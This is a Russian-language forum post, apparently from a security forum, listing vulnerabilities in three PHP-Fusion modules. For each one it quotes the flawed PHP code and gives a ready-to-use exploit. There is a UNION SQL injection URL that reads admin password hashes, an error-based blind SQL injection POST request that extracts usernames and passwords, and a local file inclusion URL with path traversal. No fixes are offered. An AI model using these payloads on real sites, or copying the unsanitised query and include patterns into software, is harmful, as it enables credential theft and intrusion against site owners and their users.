Уязвимости PHP-Fusion и модулей

[RulleR]

MOD name: FB Referer Panel (download)
Version: 0.1

-----------------------------------------------------------------------
Default table prefix: fusion_
Columns from `users`:

Код:

user_id, user_name, user_password, user_admin_password, user_email

-----------------------------------------------------------------------

SQL Injection

Vuln file: blacklist.php

PHP код:

$go = stripinput($_GET['go']);

if ($go == "blocked"){
    opentable($locale['lref_blacklisted_url']);
    echo $locale['lref_blacklisted_reason']."<br />\n";
    $query = dbquery("SELECT * FROM ".DB_LREF_BLACKLIST." WHERE lrefb_id=".stripinput($_GET["id"]));
    $row = mysql_fetch_row($query);
    echo "<div align='center'><b>".$row[2]."</b></div><br />\n";
    echo $locale['lref_blacklisted_contact']."<a href='".BASEDIR."contact.php'>".$locale['lref_blacklisted_contact2']."</a>".$locale['lref_blacklisted_contact3']; 


function stripinput (для ознакомления :))

PHP код:

function stripinput($text) {
    if (QUOTES_GPC) $text = stripslashes($text);
    $search = array("&", "\"", "'", "\\", '\"', "\'", "<", ">", "&nbsp;");
    $replace = array("&amp;", "&quot;", "'", "\", "&quot;", "'", "&lt;", "&gt;", " ");
    $text = str_replace($search, $replace, $text);
    return $text;
} 


Exploit:

Код:

http://[host]/[path]/infusions/latest_referers/blacklist.php?go=blocked&id=1+and+null+union+select+null,null,user_password+from+[prefix]users+where+user_id=1

[RulleR]

MOD name: Dynamic Star Forum Thread Ratings (download)
Version: 1.00

Blind SQL injection

Vuln file: /forum/includes/ajax_rating/rating_process.php

PHP код:

/*...*/
if($_POST) {

    $id = escape($_POST['id']);
    $rating = (int) $_POST['rating'];
    $rtype = $_POST['rtype'];
/*...*/
    if($rating <= 5 && $rating >= 1) {
    
        if ((dbarray(dbquery("SELECT rating_item_id FROM ".DB_RATINGS." WHERE rating_item_id='".$id."' AND rating_type='".$rtype."' AND rating_ip='".$_SERVER['REMOTE_ADDR']."' AND rating_user = '".$userdata."'"))) || isset($_COOKIE['has_voted_'.$id])) {
        
            echo 'already_voted'; exit;
/*...*/ 


Need: magic_quotes = off
Exploit:

Код:

POST http://[host]/[path]/forum/includes/ajax_rating/rating_process.php HTTP/1.0
Content-type: application/x-www-form-urlencoded

id=1&rating=5&rtype=1' or (select * from (select count(*),concat((select concat_ws(0x3a,user_name,user_password) from fusion_users where user_id=1),floor(rand(0)*2)) from fusion_admin group by 2)x)--

[RulleR]

MOD name: zWar Clan-Infusion (download)
Version: 2.00

Local File Inclusion

Vuln file: /infusions/zwar_warscript/fight_us.php

PHP код:

/*...*/
if (isset($_GET['lang']) && !file_exists(INFUSIONS."zwar_warscript/locale/".$_GET['lang'].".php")) { redirect( BASEDIR.'index.php' ); }
$lang = isset($_GET['lang']) ? $_GET['lang'] : "";
/*...*/
if (file_exists(INFUSIONS."zwar_warscript/locale/".$lang.".php")) {
    include INFUSIONS."zwar_warscript/locale/".$lang.".php";
}
/*...*/ 


Need: magic_quotes = Off
Exploit:

Код:

http://[host]/[path]/zwar.php?page=fight_us&lang=../../../../../[local_file]%00